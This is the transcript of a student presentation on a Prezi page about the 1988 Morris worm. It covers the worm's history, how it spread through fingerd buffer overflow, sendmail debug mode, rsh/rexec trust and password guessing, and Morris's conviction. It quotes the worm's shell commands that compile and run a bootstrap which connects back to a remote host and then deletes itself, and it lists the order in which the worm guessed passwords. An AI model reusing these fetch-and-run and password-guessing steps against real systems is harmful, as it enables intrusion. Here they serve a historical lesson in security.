Loading presentation...

Present Remotely

Send the link below via email or IM

Copy

Present to your audience

Start remote presentation

  • Invited audience members will follow you as you navigate and present
  • People invited to a presentation do not need a Prezi account
  • This link expires 10 minutes after you close the presentation
  • A maximum of 30 users can follow your presentation
  • Learn more about this feature in our knowledge base article

Do you really want to delete this prezi?

Neither you, nor the coeditors you shared it with will be able to recover it again.

DeleteCancel

Make your likes visible on Facebook?

Connect your Facebook account to Prezi and let your likes appear on your timeline.
You can change this under Settings & Account at any time.

No, thanks

MORRIS WORM

No description
by

Viktoria Shangina

on 24 November 2015

Comments (0)

Please log in to add your comment.

Report abuse

Transcript of MORRIS WORM

How it worked?
Took advantage of vulnerabilities of Unix:
sendmail program
fingerd
rsh/rexec
PROPAGATION VIA FINGER DAEMON VULNERABILITY:
• UNIX daemon which allows users to obtain information about other user over TCP/IP

Buffer overflow vulnerability (gets()):
buffer size -
512 byte
, username request -
536 byte

exec(“/bin/sh”,0,0)
History
Evening of 1988 a graduate student in Cornell University Robert T Morris jr. released first computer worm
Worm
Vs
Virus
MORRIS WORM
WHAT IS WORM?
A
self-replicating
computer program

It
uses a network
to send copies of itself to other nodes

Run
without any user
intervention

Typically, exploit
security flaws
in widely used services

In
1988
Internet was used mostly by academics to share information: among
60000
connected to Internet
10%

were effected by worm
.
Beyond the damage of caused by repeatedly infection by worm it
didn't damage anything
.
Morris jr. was
first man
judged due to computer
Fraud & Abuse act (1986)
:
he was sentenced to three years of probation
400 hours of community service
fine of $10,050 plus the costs of his supervision
Used password guessing and dictionary attack mechanism
PASSWORD VULNERABILITY:
/etc/passwd
Password guessing mechanism of the Morris worm was following:
1) NULL password
2) Username as the password
3) User name followed by itself : jsmithjsmith
4) Backward user name : htimsj
5) GECOS data from pw file
6) Special dictionary containing known pw contained 432 words
7) Exstream attack:
/user/dict/words
password guessing
dictionary attack
~ 4 weeks
SENDMAIL
Mailer program to route mail in a heterogeneous network.
• By debug option, tester can run programs to display the state of the mail system without sending mail or establishing a separate login connection
• This resulted in the worm connected to a remote shell via the TCP connection.
RSH/REXEC
rsh
and
rexec
are network services which offer remote command interpreters.
rsh:
/etc/hosts.equir; .rhosts(per user)
• Client IP, user ID
• Rely on a “privileged” originating port and permission files

rexec:
• User ID, Password
• uses password authentication
Worm priority
1) passwordless rsh
2)finger daemon
3)sendmail
4)rexec and password rsh
socket
socket
server
gets()
finger zulfiqar e example
<512 bytes
536 bytes
client
worm
worm'
512 bytes
- buffer size
cc –o x14481910 x14481910.c;
./x1448190 128.32.134.16 32341 8712440
rm –f x14481910 x14481910.c;
Echo DONE

executable code
1 of 7 times self destruction
skipped
self destruction
uses password attack
trust
rsh =remote shell
worm
worm
command
as full search ~ 4 weeks

Main program
• Collects information on other machines in the network
• Reading public configuration files
• Running system utility program

Vector program
• This vector program was 99 lines of C code that would be compiled and run on the remote machine.
• Connects back to the infecting machine, transfers the main worm binary
• Deleted automatically
What is worm?
Who, when and why created worm ?
Worm features
Worm work steps
A&Q
Plan
High level description
A&Q
Aftermath

Internet fraud
Cyberterrorism
Cyberextortion
Cyberwarfare
first worm
Cyber attacks effect real life (broker stokes ):
"Hacked AP Twitter feed reporting fake White House attack rocks markets" (2013)
torrents, Deep Web ...
2015
1988
https://play.kahoot.it/#/k/0348761e-985e-47e5-95d2-531a6da841b4
Full transcript